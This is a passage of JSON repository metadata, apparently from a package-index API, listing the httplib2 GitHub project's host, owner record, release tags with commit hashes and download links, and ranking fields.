analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T13:56:43.862Z","repository_id":5379896,"created_at":"2025-08-19T13:56:43.862Z","updated_at":"2025-08-19T13:56:43.862Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36802710,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-21T02:00:06.756Z","response_time":57,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"httplib2","name":"httplib2","uuid":"17128733","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/17128733?v=4","repositories_count":1,"last_synced_at":"2024-03-25T18:41:02.027Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/httplib2","funding_links":[],"total_stars":482,"followers":7,"following":0,"created_at":"2022-11-02T16:22:04.713Z","updated_at":"2024-03-25T18:41:02.043Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2/repositories"},"tags":[{"name":"v0.32.0","sha":"ba9bf505cd899f522f2bb58ca608444adf49afc1","kind":"commit","published_at":"2026-06-26T10:07:36.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.32.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0/manifests"},{"name":"v0.31.2","sha":"a99a11fba8d5fa3bb9c47827e5cbfd641dfb88d3","kind":"commit","published_at":"2026-01-23T10:59:34.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2/manifests"},{"name":"v0.31.1","sha":"6d2ea322d53a03d058cd8e63c12871cdd1127ca9","kind":"commit","published_at":"2026-01-13T12:08:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1/manifests"},{"name":"v0.31.0","sha":"26cfea5d07a5817cf214d9978c856c91abf4e078","kind":"commit","published_at":"2025-09-11T12:04:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0/manifests"},{"name":"v0.30.2","sha":"d9278ceafb7a05be9998a7a4b1cb7d6d3f689ee5","kind":"commit","published_at":"2025-09-10T17:35:30.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2/manifests"},{"name":"v0.30.1","sha":"6cfe2e6b5aff994f07fa0dcddfacf6d3a7999b1b","kind":"commit","published_at":"2025-09-10T16:57:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"ddfbfd579775027af57121d69f6bd913f01f9471","kind":"commit","published_at":"2025-08-29T17:58:43.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0/manifests"},{"name":"v0.22.0","sha":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7","kind":"commit","published_at":"2023-03-21T22:23:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.22.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"3094c64ee75e13530c62217180bf2a983084257e","kind":"commit","published_at":"2022-10-29T12:27:41.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.21.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0/manifests"},{"name":"v0.20.4","sha":"9d4501760c8ac66326d672ab5c94737d3d690ca4","kind":"commit","published_at":"2022-02-02T23:24:16.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4/manifests"},{"name":"v0.20.3","sha":"b10764a31c28a9f1c4ca5c24ae62422985cd6781","kind":"commit","published_at":"2021-11-19T08:46:31.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3/manifests"},{"name":"v0.20.2","sha":"f4efdff5003aa99799f304540bf139d7e08a92f2","kind":"commit","published_at":"2021-11-02T07:04:35.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2/manifests"},{"name":"v0.20.1","sha":"41804463a5d1d56fd39511e4bcc215cf0ac1e357","kind":"commit","published_at":"2021-10-07T12:57:47.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1/manifests"},{"name":"v0.20.0","sha":"a0d1e28d22ba8df56ef32f01830e12f47f39dccc","kind":"commit","published_at":"2021-10-07T08:50:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0/manifests"},{"name":"v0.19.1","sha":"58e6f66804665884393ebbe83968c0c2c16c9f70","kind":"commit","published_at":"2021-03-30T16:03:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1/manifests"},{"name":"v0.19.0","sha":"81e80d00c2b3cb51de6019cfd28b793184d7699a","kind":"commit","published_at":"2021-02-07T14:49:33.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0/manifests"},{"name":"v0.18.1","sha":"9bf300cdc372938f4237150d5b9b615879eb51a1","kind":"commit","published_at":"2020-05-20T19:56:40.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1/manifests"},{"name":"v0.18.0","sha":"8373177d3a9e4dd9c956f9bded22a5f96a00957b","kind":"commit","published_at":"2020-05-20T12:55:27.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0/manifests"},{"name":"v0.17.4","sha":"9413ffc973a2dc90abf787509ee82238345d5602","kind":"commit","published_at":"2020-05-19T14:28:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4/manifests"},{"name":"v0.17.3","sha":"f5684876ef5e3b57c81f716c08b316fa36684f08","kind":"commit","published_at":"2020-04-22T09:09:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3/manifests"},{"name":"v0.17.2","sha":"067b3f250769e921dc397e28f3aadd0ffa14e17b","kind":"tag","published_at":"2020-04-10T23:24:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2/manifests"},{"name":"v0.17.1","sha":"0d490f692ca5f73cd2caaf9cc5e42e9f7702e453","kind":"tag","published_at":"2020-04-02T18:21:23.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1/manifests"},{"name":"v0.17.0","sha":"67463426cf79af766176b1f318fefefd3d5edc23","kind":"tag","published_at":"2020-01-24T14:12:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"a128b94898068fb9357bb693f134c5d0a2443871","kind":"tag","published_at":"2020-01-15T22:54:53.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.16.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"095494db43abe8ddfd53b3c389baaadbfcae4f12","kind":"tag","published_at":"2019-12-19T14:34:09.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.15.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"761558788d540b9442cd1614570074c61aa0bfca","kind":"tag","published_at":"2019-09-27T04:44:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.14.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0/manifests"},{"name":"v0.13.1","sha":"d498ee35017a9498cff3e9aa9887b95b988e6ca9","kind":"tag","published_at":"2019-07-28T11:28:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1/manifests"},{"name":"v0.13.0","sha":"e92155b85c719405fefe69b045f3bcf55d4fbcc1","kind":"commit","published_at":"2019-06-06T19:40:38.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0/manifests"},{"name":"v0.12.3","sha":"dd741d17b595ef47a12f06f7db823fb85edab603","kind":"commit","published_at":"2019-04-24T05:30:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3/manifests"},{"name":"v0.12.1","sha":"ead7f8038f1cd02a923544c4f3294c1389ad3e03","kind":"commit","published_at":"2019-02-14T16:38:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1/manifests"},{"name":"v0.12.0","sha":"86c3b4ea8614cbbddd86fc556781f2f79cd7c2ac","kind":"commit","published_at":"2018-11-14T04:40:05.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0/manifests"},{"name":"v0.11.3","sha":"70fb0c820d2e8211992b402d34444e4b32a1cb6e","kind":"commit","published_at":"2018-03-30T02:21:39.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3/manifests"},{"name":"v0.11.2","sha":"470bb2a9db658b7f851522051f2b0201a21e8925","kind":"commit","published_at":"2018-03-30T02:09:45.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2/manifests"},{"name":"v0.11.1","sha":"f20cd36c44b75d9206f050304937d5f4d63f5b7a","kind":"commit","published_at":"2018-03-26T17:15:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1/manifests"},{"name":"v0.11.0","sha":"5dee729d87cecab1b6c0d7874a8bbd8d24452849","kind":"commit","published_at":"2018-03-21T18:13:04.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0/manifests"},{"name":"v0.10.3","sha":"1ae16e0e8e868e4b81225631ee37c6555493014b","kind":"commit","published_at":"2017-02-06T17:56:20.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"ef81f9566ee765b8f3d93429e3dfa17341d098e7","kind":"commit","published_at":"2017-02-03T21:09:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"4623377a073e1027a691fe139ba1e851eabf0d49","kind":"commit","published_at":"2017-02-03T19:43:17.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1/manifests"},{"name":"0.9.2","sha":"cf631a73e2f3f43897b65206127ced82382d35f5","kind":"tag","published_at":"2015-09-28T13:53:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2/manifests"},{"name":"0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"tag","published_at":"2015-09-28T13:52:59.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1/manifests"},{"name":"v0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"commit","published_at":"2015-04-11T13:50:15.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1/manifests"},{"name":"v0.9","sha":"058a1f9448d5c27c23772796f83a596caf9188e6","kind":"commit","published_at":"2014-04-15T12:53:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9/manifests"},{"name":"0.9","sha":"0197ec868a4fc638c08358b94200ffd6ddb1bf50","kind":"tag","published_at":"2014-04-14T12:50:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9/manifests"}]},"repo_metadata_updated_at":"2026-08-21T23:57:46.417Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"pu